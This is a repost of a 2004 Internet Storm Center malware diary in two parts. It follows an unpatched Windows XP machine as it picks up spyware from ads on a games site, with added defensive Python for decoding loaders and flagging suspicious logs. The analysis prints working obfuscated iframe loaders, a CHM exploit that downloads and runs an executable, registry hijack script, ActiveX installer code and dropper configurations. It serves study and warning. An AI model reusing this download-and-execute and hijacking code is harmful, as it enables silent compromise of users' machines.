
One of the most successful series of the Internet Storm Center


At least read the first 3 paragraphs (then you will know why you need to read the whole thing)

Tom Liston's Following the Bouncing Malware - Part I:


On July 20th, after investigating some adware/spyware/malarial that had been loaded onto a machine without the user's knowledge, I decided to try an experiment. I wondered just exactly how easy it really was to get an unpatched machine compromised, and what it would look like to "Joe Average" computer user. I set up a VMWare image of a fresh install of Windows XP Home Edition, and headed out on the internet to see just exactly what happened. My trip was an enlightening journey into the dangers lurking out on the 'net for the unwary, and along the way I've learned some interesting things about the spyware/adware industry.

Today's diary entry represents the first part of my analysis of what happened when I "forgot to use protection" on the Internet. In part II, I'll examine the full extent of the damage that my poor "Joe Average" would have received, and perhaps add a little "editorializing" to my findings.

To give you a little "preview", I'll say this: I discovered that as far as the adware/spyware industry is concerned, you may be the one that plunked down a grand at your local consumer electronics store to purchase your PC, but THEY own it. They'll do whatever they want, whenever they want, and you don't get a say in the matter. The utter "ballsy-ness" of what they do will astonish you, and I hope reading this might make some of the people enabling this sort of activity to wake up and take action.


Obviously, what happened in my little experiment would be a result of where I decided to go on the net. To be perfectly fair, the sites that will be mentioned in this essay are only a cross-section of the evil that is waiting out there on the net - they're probably no better, or worse than any of the other adware/spyware ilk. My choice of a "starting point" was based on the incident that I had just investigated.

In deciding to be "Joe Average", I tried to replicate (as well as possible) the machine that I had just investigated. That machine had IE6.0 with the Google Toolbar installed with the popup blocker active. Please keep this setup in mind as I "follow the bouncing malware."

Also, something to keep in mind: I'm not going to set up any of the URLs in this tale so that they act as hyperlinks. This is done on purpose. DO NOT FOLLOW THE PATH I'M DESCRIBING HERE, ESPECIALLY IF YOU ARE RUNNING AN UNPATCHED MACHINE. THIS MEANS YOU. REALLY.

After installing the Google Toolbar, I did exactly what my "Joe Average" had done to get his machine compromised: Googled. Someone had told him about "Yahoo Games", and well, he wanted to check it out. I put "Yahoo games" into Google and then clicked on "www.yahoogamez.com" (NOTE: If you're running an unpatched machine, DO NOT GO THERE).

yahoogamez.com is a website that contains links to many different online games, and while I have no idea if their games are any good, their advertisements are certainly interesting. Like many websites which offer online games, the idea here is to get people to visit the site and generate revenue based on advertising that appears on the site and provides an income based on both the number of times an ad is displayed ("impressions") and, especially, on any "click through" traffic. Generally, the site owner contracts with another company that acts as a "go-between", selling "placement" to advertisers, and contracting with sites to display ads. Many of these online advertising companies then provide servers that, on a rotating basis, dole out the code and images for ads to participating websites.

In two instances on the yahoogamez.com site, there are ads provided by "aim4media.com". Going to the yahoogamez website results in a flurry of HTTP activity, including the following:

[20/Jul/2004:13:50:11 -0500] "GET_http://adserver.aim4media.com" - - "/adframe.php?n=a788e363&what=zone:450&;%20amp;target=_new HTTP/1.1"

Which results in the following HTML:

-----------------------------------------------------------------------------------------------------------
<html>
<head>
<title>Advertisement</title>
</head>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-color:transparent'>
<iframe src="http://205.236.189.58/mynet/mynet-MML.html" width=468 height=60 hspace=0 vspace=0
frameborder=0 marginheight=0 marginwidth=0 scrolling=no> <a href="http://205.236.189.58/mynet/mynet-MML.html"
target="_blank"><img width=468 height=60 src="http://205.236.189.58/mynet/mynet-MML.html" border=0></a></iframe>
<div id="beacon_459" style="position: absolute; left: 0px; top: 0px; visibility: hidden;">
<img src='http://adserver.aim4media.com/adlog.php?bannerid=459&amp;clientid=431&amp;zoneid=450&amp;source=&amp;
block=86400&amp;capping=3&amp;cb=7da741942b0623acd85070683ffa3ad8' width='0' height='0' alt='' style='width: 0px;
height: 0px;'></div>
</body>
</html>

-----------------------------------------------------------------------------------------------------------

This results in the following HTTP GET:
[20/Jul/2004:13:50:14 -0500] "GET_http://205.236.189.58" - - "/mynet/mynet-MML.html HTTP/1.1"

-----------------------------------------------------------------------------------------------------------
And the following HTML gets downloaded:
<a href="http://www.lovemynet.com/?frombanner2" target="_blank">
<img src="http://209.50.251.182/lovemynet/banner1.gif" width=468 height=60 border=0>
</a>
<!-- HP2 -->
<script type="text/javascript">document.write('
\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022
\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0036\u0039\u002e\u0035\u0030\u002e
\u0031\u0033\u0039\u002e\u0036\u0031\u002f\u0068\u0070\u0032\u002f\u0068\u0070
\u0032\u002e\u0068\u0074\u006d\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d
\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u003e\u003c\u002f
\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>

-----------------------------------------------------------------------------------------------------------

Looks like someone is trying to hide something... This decodes to:
<iframe src="http://69.50.139.61/hp2/hp2.htm" width=1 height=1></iframe>

-----------------------------------------------------------------------------------------------------------
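As an added analysis aid (my code, not the diary's), here is a small Python decoder for this \uXXXX-escaped document.write() trick. It is run over the lovemynet banner above and, for the textarea/${PATH} loader that is decoded a little further down, works out which URL the browser ends up requesting for the CHM. Both sample inputs are copied from this page; the function names are my own.

```python
import re
from html.parser import HTMLParser

# Sample 1: the banner HTML quoted above, whose document.write() string is
# a run of \uXXXX escapes wrapped over several lines (copied from the page).
SAMPLE_BANNER = r"""<a href="http://www.lovemynet.com/?frombanner2" target="_blank">
<img src="http://209.50.251.182/lovemynet/banner1.gif" width=468 height=60 border=0>
</a>
<!-- HP2 -->
<script type="text/javascript">document.write('
\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022
\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0036\u0039\u002e\u0035\u0030\u002e
\u0031\u0033\u0039\u002e\u0036\u0031\u002f\u0068\u0070\u0032\u002f\u0068\u0070
\u0032\u002e\u0068\u0074\u006d\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d
\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u003e\u003c\u002f
\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>
"""

# Sample 2: the hp2.htm loader as it reads once decoded (copied from the page).
# Note the &#109; entity hiding the "ms-its:" protocol from a plain grep, and
# the ${PATH} placeholder that is filled in at run time from location.href.
SAMPLE_LOADER = r"""<textarea id="code" style="display:none;">
    <object data="&#109;s-its:mhtml:file://C:\foo.mht!${PATH}/HP2.CHM::/hp2.htm" type="text/x-scriptlet"></object>
</textarea>
<script language="javascript">
    document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,location.href.indexOf('hp2.htm'))));
</script>
"""

WRITE_RE = re.compile(r'''document\.write\(\s*(['"])(.*?)\1\s*\)''', re.S)
ESC_RE = re.compile(r"\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})")
TEXTAREA_RE = re.compile(r"<textarea\b[^>]*>(.*?)</textarea>", re.S | re.I)


def decode_escapes(literal):
    """Turn JavaScript \\uXXXX (and \\xXX) escapes back into characters."""
    return ESC_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), literal)


def decode_document_writes(page_html):
    """Decoded string argument of every document.write('...') call on a page.
    Line breaks inside the literal (the wrapping seen on this page) are dropped."""
    decoded = []
    for m in WRITE_RE.finditer(page_html):
        literal = re.sub(r"[\r\n]+", "", m.group(2))
        decoded.append(decode_escapes(literal))
    return decoded


def textarea_value(html):
    """What code.value holds in the loader: the text between the textarea tags."""
    m = TEXTAREA_RE.search(html)
    return m.group(1) if m else ""


class _LoaderTags(HTMLParser):
    """Collect the attributes that make the browser go and fetch something else."""
    WATCH = {"iframe": "src", "object": "data", "script": "src", "embed": "src"}

    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        wanted = self.WATCH.get(tag)
        for name, value in attrs:
            if wanted and name == wanted and value:
                # HTMLParser has already expanded &#109; into 'm' at this point
                self.found.append((tag, value))


def loaded_resources(html):
    parser = _LoaderTags()
    parser.feed(html)
    parser.close()
    return parser.found


def resolve_path_placeholder(url, page_url, marker):
    """Mirror the loader's own substitution: ${PATH} becomes location.href cut
    just before `marker` ('hp2.htm'), i.e. the directory part of the page URL."""
    return url.replace("${PATH}", page_url[:page_url.index(marker)])


def http_target(ms_its_url):
    """From ms-its:mhtml:file://C:\\foo.mht!<URL>::/hp2.htm return <URL>, the
    request that actually shows up in the web log (note the doubled slash)."""
    bang = ms_its_url.index("!")
    return ms_its_url[bang + 1:ms_its_url.index("::", bang)]


def chm_request_for(loader_html, page_url, marker="hp2.htm"):
    """The loader writes code.value into the page, so inspect the textarea
    contents and work out which HTTP URL the CHM would be pulled from."""
    markup = textarea_value(loader_html) or loader_html
    for tag, value in loaded_resources(markup):
        if tag == "object" and value.lower().startswith("ms-its:"):
            return http_target(resolve_path_placeholder(value, page_url, marker))
    return None
```

Run against the page's hp2.htm URL, chm_request_for() returns http://69.50.139.61/hp2//HP2.CHM, which is exactly the doubled-slash request that appears in the log a few lines further on.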

[20/Jul/2004:13:50:17 -0500] "GET_http://69.50.139.61" - - "/hp2/hp2.htm HTTP/1.1"

Which gives us:
-----------------------------------------------------------------------------------------------------------
<!-- NEW Z.D.E.-D.B.D. w/ vu083003-H.P.S. (c) April 2004 SmartBot -->
<script type="text/javascript">document.write('
\u003c\u0074\u0065\u0078\u0074\u0061\u0072\u0065\u0061\u0020\u0069\u0064\u003d
\u0022\u0063\u006f\u0064\u0065\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d
\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065
\u003b\u0022\u003e\u000d\u000a\u0020\u0020\u0020\u0020\u003c\u006f\u0062\u006a
\u0065\u0063\u0074\u0020\u0064\u0061\u0074\u0061\u003d\u0022\u0026\u0023\u0031
\u0030\u0039\u003b\u0073\u002d\u0069\u0074\u0073\u003a\u006d\u0068\u0074\u006d
\u006c\u003a\u0066\u0069\u006c\u0065\u003a\u002f\u002f\u0043\u003a\u005c\u0066
\u006f\u006f\u002e\u006d\u0068\u0074\u0021\u0024\u007b\u0050\u0041\u0054\u0048
\u007d\u002f\u0048\u0050\u0032\u002e\u0043\u0048\u004d\u003a\u003a\u002f\u0068
\u0070\u0032\u002e\u0068\u0074\u006d\u0022\u0020\u0074\u0079\u0070\u0065\u003d
\u0022\u0074\u0065\u0078\u0074\u002f\u0078\u002d\u0073\u0063\u0072\u0069\u0070
\u0074\u006c\u0065\u0074\u0022\u003e\u003c\u002f\u006f\u0062\u006a\u0065\u0063
\u0074\u003e\u000d\u000a\u003c\u002f\u0074\u0065\u0078\u0074\u0061\u0072\u0065
\u0061\u003e\u000d\u000a\u000d\u000a\u003c\u0073\u0063\u0072\u0069\u0070\u0074
\u0020\u006c\u0061\u006e\u0067\u0075\u0061\u0067\u0065\u003d\u0022\u006a\u0061
\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u0022\u003e\u000d\u000a\u0020
\u0020\u0020\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0077
\u0072\u0069\u0074\u0065\u0028\u0063\u006f\u0064\u0065\u002e\u0076\u0061\u006c
\u0075\u0065\u002e\u0072\u0065\u0070\u006c\u0061\u0063\u0065\u0028\u002f\u005c
\u0024\u007b\u0050\u0041\u0054\u0048\u007d\u002f\u0067\u002c\u006c\u006f\u0063
\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u002e\u0073\u0075
\u0062\u0073\u0074\u0072\u0069\u006e\u0067\u0028\u0030\u002c\u006c\u006f\u0063
\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u002e\u0069\u006e
\u0064\u0065\u0078\u004f\u0066\u0028\u0027\u0068\u0070\u0032\u002e\u0068\u0074
\u006d\u0027\u0029\u0029\u0029\u0029\u003b\u000d\u000a\u003c\u002f\u0073\u0063
\u0072\u0069\u0070\u0074\u003e')</script>

-----------------------------------------------------------------------------------------------------------

Which decodes to:
<textarea id="code" style="display:none;">
    <object data="&#109;s-its:mhtml:file://C:\foo.mht!${PATH}/HP2.CHM::/hp2.htm" type="text/x-scriptlet"></object>
</textarea>

<script language="javascript">
    document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,location.href.indexOf('hp2.htm'))));
</script>

-----------------------------------------------------------------------------------------------------------

[20/Jul/2004:13:50:20 -0500] "GET_http://69.50.139.61" - - "/hp2//HP2.CHM HTTP/1.1"

Within this chm exploit, we find the following hp2.htm file:

-----------------------------------------------------------------------------------------------------------
<script language="vbscript">
Function Exists(filename)
On Error Resume Next
LoadPicture(filename)
Exists = Err.Number = 481
End Function
</script>
<script language="javascript">
var oPopup = window.createPopup();
function showPopup()
{
oPopup.document.body.innerHTML =
"<object data=http://209.50.251.182/vu083003/object-c002.cgi>";
oPopup.show(0,0,1,1,document.body);
}
showPopup()
wmplayerpaths= [
"C:\\Programmer\\Windows Media Player\\wmplayer.exe",
"C:\\Program\\Windows Media Player\\wmplayer.exe",
"C:\\Programme\\Windows Media Player\\wmplayer.exe",
"C:\\Programmi\\Windows Media Player\\wmplayer.exe",
"C:\\Programfiler\\Windows Media Player\\wmplayer.exe",
"C:\\Programas\\Windows Media Player\\wmplayer.exe",
"C:\\Archivos de programa\\Windows Media Player\\wmplayer.exe",
"C:\\Program Files\\Windows Media Player\\wmplayer.exe"
];
for (i=0;i<wmplayerpaths.length;i++) {
wmplayerpath = wmplayerpaths[i];
if (Exists(wmplayerpath))
break;
}
function getPath(url) {
start = url.indexOf('http:')
end = url.indexOf('HP2.CHM')
return url.substring(start, end);
}
payloadURL = getPath(location.href)+'hp2.exe';
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET",payloadURL,0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile(wmplayerpath,2);
var win=null;
function NewWindow(mypage,myname,w,h,scroll,pos){
if(pos=="random"){
LeftPosition=(screen.width)?Math.floor(Math.random()*(screen.width-w)):100;
TopPosition=(screen.height)?Math.floor(Math.random()*((screen.height-h)-75)):100;
}
if(pos=="center"){
LeftPosition=(screen.width)?(screen.width-w)/2:100;
TopPosition=(screen.height)?(screen.height-h)/2:100;
}
else if((pos!="center" && pos!="random") || pos==null){
LeftPosition=0;TopPosition=20
}
settings='width='+w+',height='+h+',top='
+TopPosition+',left='+LeftPosition
+',scrollbars='+scroll
+',location=no,directories=no,status=no,menubar=no,toolbar=no,resizable=no';
win=window.open(mypage,myname,settings);
}
location.href = "mms://";
</script>


-----------------------------------------------------------------------------------------------------------

Following along...
[20/Jul/2004:14:03:55 -0500] "GET_http://209.50.251.182" - - "/vu083003/object-c002.cgi HTTP/1.1"

-----------------------------------------------------------------------------------------------------------
<html>
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script>
wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",
"http://default-homepage-network.com/start.cgi?new-hkcu");
wsh.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",
"http://default-homepage-network.com/start.cgi?new-hklm");
wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar",
"http://server224.smartbotpro.net/7search/?new-hkcu");
wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst", "no");
wsh.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar",
"http://server224.smartbotpro.net/7search/?new-hklm");
wsh.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst", "no");
</script>
<script language=javascript>
self.close()
</script>
</html>


-----------------------------------------------------------------------------------------------------------

Well, our home page just got changed, as did our default search engine... Nice, real nice. But that's not all... there was a file called "hp2.exe" that was downloaded and executed by our .chm exploit. Sure enough, looking at my logs, I found:

[20/Jul/2004:13:50:25 -0500] "GET_http://69.50.139.61" - - "/hp2//hp2.exe HTTP/1.1"

hp2.exe is what is known as a "dropper" program. That is, it is actually a small "stub" program with another (sometimes more than one) program attached to it as "data". When the program executes, it writes out the "data" to a file and then executes the resulting program. hp2.exe drops a UPX packed executable that, when executed, will contact www.totalvelocity.com/Bundling/tvmupdater4bp5.exe, which installs/updates the "TV Media Display" spyware.
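As an added example (mine, not from the diary), the request lines quoted so far run through a few simple drive-by heuristics in Python. The log layout, hosts and paths are copied from this page; the rule names and the 30-second window are my own choices.

```python
import re
from datetime import datetime

# Constructed from the request lines quoted on this page (same log layout:
# timestamp, "GET_<scheme://host>", two dashes, then "<path> HTTP/1.1").
SAMPLE_LOG = """\
[20/Jul/2004:13:50:11 -0500] "GET_http://adserver.aim4media.com" - - "/adframe.php?n=a788e363&what=zone:450&;%20amp;target=_new HTTP/1.1"
[20/Jul/2004:13:50:14 -0500] "GET_http://205.236.189.58" - - "/mynet/mynet-MML.html HTTP/1.1"
[20/Jul/2004:13:50:17 -0500] "GET_http://69.50.139.61" - - "/hp2/hp2.htm HTTP/1.1"
[20/Jul/2004:13:50:20 -0500] "GET_http://69.50.139.61" - - "/hp2//HP2.CHM HTTP/1.1"
[20/Jul/2004:13:50:25 -0500] "GET_http://69.50.139.61" - - "/hp2//hp2.exe HTTP/1.1"
[20/Jul/2004:13:51:57 -0500] "GET_http://addictivetechnologies.net" - - "/dm0/js/Confirmfr03tp.js HTTP/1.1"
[20/Jul/2004:13:51:58 -0500] "GET_http://www.addictivetechnologies.net" - - "/DM0/cab/fr03tp.cab HTTP/1.1"
[20/Jul/2004:14:03:55 -0500] "GET_http://209.50.251.182" - - "/vu083003/object-c002.cgi HTTP/1.1"
"""

LINE_RE = re.compile(
    r'^\[(?P<ts>[^\]]+)\] "GET_(?P<scheme>https?)://(?P<host>[^"/]+)" - - '
    r'"(?P<path>\S+) HTTP/1\.[01]"$')
IP_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
RISKY_EXT = (".chm", ".exe", ".cab", ".dll", ".scr")


def parse_log(text):
    """One dict per request: parsed timestamp, host and raw path."""
    requests = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip anything that is not a request line
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        requests.append({"ts": ts, "host": m["host"], "path": m["path"]})
    return requests


def flag_requests(requests, window_s=30):
    """Drive-by heuristics over a time-ordered request list. Returns
    (rule, host, path) tuples:
      ip-host-binary : executable content pulled from a host named only by IP
      double-slash   : '//' inside the path, the fingerprint of the ${PATH}
                       concatenation in the hp2.htm loader
      fast-follow    : binary fetched within window_s seconds of an .htm/.html
                       page from the same host"""
    alerts = []
    last_html = {}  # host -> time of its most recent HTML fetch
    for r in requests:
        path = r["path"].split("?", 1)[0]  # drop the query string
        low = path.lower()
        is_bin = low.endswith(RISKY_EXT)
        if low.endswith((".htm", ".html")):
            last_html[r["host"]] = r["ts"]
        if is_bin and IP_HOST.match(r["host"]):
            alerts.append(("ip-host-binary", r["host"], path))
        if "//" in path:
            alerts.append(("double-slash", r["host"], path))
        prev = last_html.get(r["host"])
        if is_bin and prev is not None and (r["ts"] - prev).total_seconds() <= window_s:
            alerts.append(("fast-follow", r["host"], path))
    return alerts


if __name__ == "__main__":
    for rule, host, path in flag_requests(parse_log(SAMPLE_LOG)):
        print(f"{rule:15} {host:25} {path}")
```

The .cab from addictivetechnologies.net is deliberately not caught by these three rules; it is a named host with no preceding HTML page in the log, which is a reminder that the ActiveX install path needs its own rule.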

At this point, I followed one link on the site which required Flash. Since I didn't have Flash installed, I went "back". But because my original visit to the site had placed cookies on my computer, one of yahoogamez' files, popup.js, now behaves differently.

This time, this code within popup.js is executed:

-----------------------------------------------------------------------------------------------------------
if ((document.cookie.indexOf("popuptraffic") != -1 ) && (document.cookie.indexOf("popupsponsor") == -1)){
var expdate = new Date((new Date()).getTime() + 1800000);
document.cookie="popupsponsor=general; expires=" + expdate.toGMTString() + "; path=/;";
document.write("<script language=\"JavaScript\"
src=\"http://addictivetechnologies.net/dm0/js/Confirmfr03tp.js\"></script>");
}

-----------------------------------------------------------------------------------------------------------

[20/Jul/2004:13:51:57 -0500] "GET_http://addictivetechnologies.net" - - "/dm0/js/Confirmfr03tp.js HTTP/1.1"

-----------------------------------------------------------------------------------------------------------
var exepath='http://www.addictivetechnologies.net/DM0/cab/fr03tp.cab';
var retry_enabled = true;
var retry_cnt=1;
document.write('<iframe id="downloads_manager" style="position:absolute;visibility:hidden;"></iframe>');
function retry() {
if(retry_cnt>0) {
alert("To install latest AT- Games update, please click Yes");
start_download();
retry_cnt--;
} else {
//alert("This is a 1 time install, once you click Open it will never pop up this message again");
//downloads_manager.window.location = "http://www.addictivetechnologies.net/DM0/exe/fr03tp.exe";
}
}
function start_download()
{
var bname=navigator.appName;
var bver=parseInt(navigator.appVersion);
if ( navigator.platform && navigator.platform != 'Win32' ){
//alert("Sorry, your browser is not WIN32 Compatible");
}
if (bname == 'Microsoft Internet Explorer' && bver >= 2){
document_code = '<html><head>\n';
document_code += '<\/head><body>\n';
document_code += '<object onerror="window.parent.retry();" id="DDownload_UL1"
classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA"
codebase="http://www.addictivetechnologies.net/DM0/cab/fr03tp.cab"
HEIGHT=0 WIDTH=0></object>\n';
document_code += '<\/body><\/html>';
downloads_manager.document.write(document_code);
downloads_manager.document.close();
}
else if (bname == 'Netscape' && bver >= 4) {
trigger = netscape.softupdate.Trigger;
if (trigger.UpdateEnabled) {
//trigger.StartSoftwareUpdate(exepath, trigger.DEFAULT_MODE)
} else {
location.replace(exepath);
}
} else {
location.replace(exepath);
}
}
start_download();

-----------------------------------------------------------------------------------------------------------

[20/Jul/2004:13:51:58 -0500] "GET_http://www.addictivetechnologies.net" - - "/DM0/cab/fr03tp.cab HTTP/1.1"

This cab file contains two files:

ATPartners.inf - 403 bytes
ATPartners.dll - 96,256 bytes

The .dll file is identified by AV software as the Win32/TrojanDownloader.Rameh.C trojan.

And that's where I'm going to end it for today. In the next part, I'll take a look at what happens as this chain of malware continues on its merry way, and I'll also investigate what happens when I fire up IE the next time and visit my new home page.

-------------------------------------------------------------

 
Tom Liston's Following the Bouncing Malware - Part II

Note: The links in this part of the diary are purposely not clickable. DO NOT GO TO THESE SITES. THIS MEANS YOU. REALLY.

Welcome back to Part II of our journey through the seamier side of the internet. To those of you who wrote in asking, I’m sorry it took so long to get this put together and up...

In case you missed Part I, or in case you simply want to review, here's a link to where we started:
http://isc.sans.org/diary.php?date=2004-07-23

Go on... I’ll wait.
Ready? Good.

When we last left our intrepid "Joe Average" computer user, he had just installed Windows XP Home Edition, and gone out on the Internet in search of some fun and adventure. If you recall, someone had told him about Yahoo! Games and he wanted to try them out. Using Google, and ignoring (for whatever reason) several obvious links to Yahoo!, he scrolled down near the bottom of the first Google search page and clicked on a link leading to www.yahoogamez.com.

That's when the fun began.

With an IFRAME here and a CHM exploit there, Joe Average’s shiny new computer was transformed into something new... something Joe never dreamed it would become: an S.E.P.
"Somebody Else’s PC."
Huh?

Well, although Joe still owns (letter "o") the hardware, and gets the privilege of supplying it with electricity and an internet connection, someone else now 0wns (zero) his computer, and they’re making all of Joe's bright and shiny hardware dance to a tune that THEY’RE playing.

You see: All Joe wants his hardware to do is stop all of this nonsense and leave him in peace to play a rousing round of "Donut Boy 2" from the yahoogamez site. But the new happy-go-lucky pals that he's picked up while browsing have some other things in mind...

When I paused our adventure at the end of Part I, the list of "stuff" done to Joe's computer looked like this:
1) Joe's homepage had been changed. It is now set to:
http://default-homepage-network.com/start.cgi?new-hkcu
2) The default search page has been set to:
http://server224.smartbotpro.net/7search/?new-hkcu
3) Search assist has been turned off.
4) "TV Media Display" has been installed on Joe's machine (more on this later.)
5) addictivetechnologies.net had graced Joe's machine with a file identified by AV software as Win32/TrojanDownloader.Rameh.C.
So... what do Joe Average's new found buddies have planned for him next? Let's find out together as we continue to follow the bouncing malware.

Let's start by taking a look inside the file that Addictive Technologies "gave" to Joe. If you’ll recall, it was a .cab file called "fr03tp.cab," containing two files:
ATPartners.inf – 403 bytes
ATPartners.dll – 96,256 bytes

(Some editorializing: The ATPartners.dll contains a statically linked copy of the MSVC runtime. This is completely unnecessary. Addictive Technologies: If you're going to write malware, at least write EFFICIENT malware.)

Looking at the strings contained within the .dll file, we find some interesting stuff:
/F1/Cmd4F1_fr03t.txt
www.f1organizer.com
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects

And some downright bizarre stuff:
Hara Hara Mahadev !!!
tum agar badshah hai to hum eespeek ka yekka!

(Would anyone care to enlighten me?)

Putting some obvious "stuff" from that list together, we get ourselves a URL:
http://www.f1organizer.com/F1/Cmd4F1_fr03t.txt
where we find the following interesting message:
[NextConfigFile]
Server=www.f1organizer.com
Object=/F1/audit/DMOnewSB/Cmd4F1_fr03t_Upd3.txt

[AddF1]
Folder=AT-Games
Link=http://www.gamehouse.com/affiliates/template.jsp?AID=2226
Name=Gamehouse Games

[AddF2]
Folder=AT-Games
Link=http://www.regnow.com/softsell/visitor.cgi?affiliate=24998&action=site&vendor=7551
Name=Big Fish Games

[AddF3]
Folder=AT-Games
Link=http://www.regnow.com/softsell/visitor.cgi?affiliate=24998&action=site&vendor=7834
Name=FlyorDie Games

[AddF4]
Folder=..\\Desktop\\
Link=http://www.007arcadegames.com
Name=007arcadegames.com
IconFile=http://www.007arcadegames.com/007.ico
IconIndex=0

[UpdateList]
Server1=www.f1organizer.com
Object1=/F1/objects/ezbdlLs.dll
InstallName1=bdlds.dll
RepURL1=http://www.f1organizer.com/F1/audit/Ack/Ack4Freeze.htm

Server2=www.AddictiveTechnologies.net
Object2=/LoadShare/SplWbr.dll
InstallName2=SplWbr.dll
RepURL2=http://www.f1organizer.com/F1/audit/Ack/Ack4SB2.htm
(Is it just me, or did anyone else find the term "softsell" in the above "RegNow" URLs more than a bit amusing?)

Hey look! More stuff was "updated" on Joe's computer: Let's see... They're adding some stuff to Joe's Internet "Favorites" to advertise purchase links for games that AT gets affiliate bucks for (Gamehouse Games, Big Fish Games, and FlyorDie Games), they've added a link on Joe's Desktop to "007arcadegames," and they're downloading more gifts for Joe: ezbdlLs.dll and SplWbr.dll.

SplWbr.dll weighs in at a whopping 454,656 bytes and is what is known in the AntiVirus biz as a "file dropper." That is, when it is executed, it writes out and installs or executes one or more files that are attached to it as data. In this case, it drops out two files:
Drop#1 – 135,088 bytes which claims to be "Ad Destroyer and Virtual Bouncer Installation" and is digitally signed by Spyware Labs, Inc. (www.spywarelabs.com).
Drop#2 – 302,544 bytes which silently installs "TopRebates.com AutoTrack software" (www.toprebates.com).

ezbdlLs.dll is a 151,040 byte UPX compressed .dll that expands to 176,128 bytes when uncompressed. It too is a file dropper, gracing Joe's machine with three new gifts:
Drop#1 – 65,536 bytes of ASPacked goodness from www.abetterinternet.com which claims to be a "[u]tility for downloading files and upgrading software. Visit www.abetterinternet.com for more info."
Drop#2 – 33,280 bytes of UPX packed fun which expands into 65,536 bytes of crappy software engineering from the fine folks at ezULA (www.ezula.com) whose stated goal is "Making Your Internet Browsing Simple, Exciting, and Personal." Uh... no thank you.
Drop#3 – 65,024 bytes filled with a NullSoft Installer that gifts Joe's machine with SAHAgent, a Winsock2 Layered Service Provider (LSP) that installs itself in Joe's WinSock stack, much like a personal firewall. SAHAgent redirects select web traffic to cause online purchases made by Joe to be done in a way that will route any affiliate bucks to a specific affiliate ID.

So, what's the upshot of this whole mess? Well, Joe has had five new software packages installed onto his machine, redirecting his browsing, his searching, and his online purchases to suit the desires of the (no-doubt ;-) fine, upstanding people at ATPartners. His Internet browsing will now be "Simple, Exciting, and Personal" (ezula), he’ll always know that "The Best Downloads are Free" (abetterinternet), his computer will show him the "Smart way to put money in your pocket" (TopRebates) and he needn’t worry about adware/spyware any more because Virtual Bouncer has been installed to... uh... bounce it (Spyware Labs). Oh, and his online purchases will earn money for... uh... um.... someone. (SAHAgent). Joe should be so very, very happy.

But did you happen to notice THIS section in the text-file o' instructions that the ATPartners.dll downloaded?
[NextConfigFile]
Server=www.f1organizer.com
Object=/F1/audit/DMOnewSB/Cmd4F1_fr03t_Upd3.txt

Next time around, we’re going to download a DIFFERENT set of "configuration" instructions:
[NextConfigFile]
Server=www.f1organizer.com
Object=/F1/audit/DMOnewSB/Cmd4F1_fr03t_Upd3.txt

[UpdateList]
Server1=www.f1organizer.com
Object1=/F1/objects/msbb693.dll
InstallName1=msbb321.dll
RepURL1=http://www.f1organizer.com/F1/audit/Ack/Ack4F1_nCase321.htm

Server2=www.f1organizer.com
Object2=/F1/objects/ezbdlLs.dll
InstallName2=bdlds.dll
RepURL2=http://www.f1organizer.com/F1/audit/Ack/Ack4Freeze.htm

Server3=www.f1organizer.com
Object3=/F1/objects/W2020Setup.dll
InstallName3=W2020Setup.dll
RepURL3=http://www.f1organizer.com/F1/audit/Ack/Ack4F1_Cls.htm

Server4=www.f1organizer.com
Object4=/F1/objects/MyDailyHoroscope.dll
InstallName4=MyDailyHoroscope.dll
RepURL4=http://www.f1organizer.com/F1/audit/Ack/Ack4F1_Cls.htm

Server-4=www.f1organizer.com
Object-4=/F1/objects/ezStD.dll
InstallName-4=ezStub3.dll
RepURL-4=http://www.f1organizer.com/F1/audit/Ack/Syn4F1_eZula.htm

Server-6=www.f1organizer.com
Object-6=/F1/objects/MoreResultsSetup.dll
InstallName-6=MoreResultsSetup.dll
RepURL-6=http://www.f1organizer.com/F1/audit/Ack/Ack4F1_Cls.htm

Server-3=www.f1organizer.com
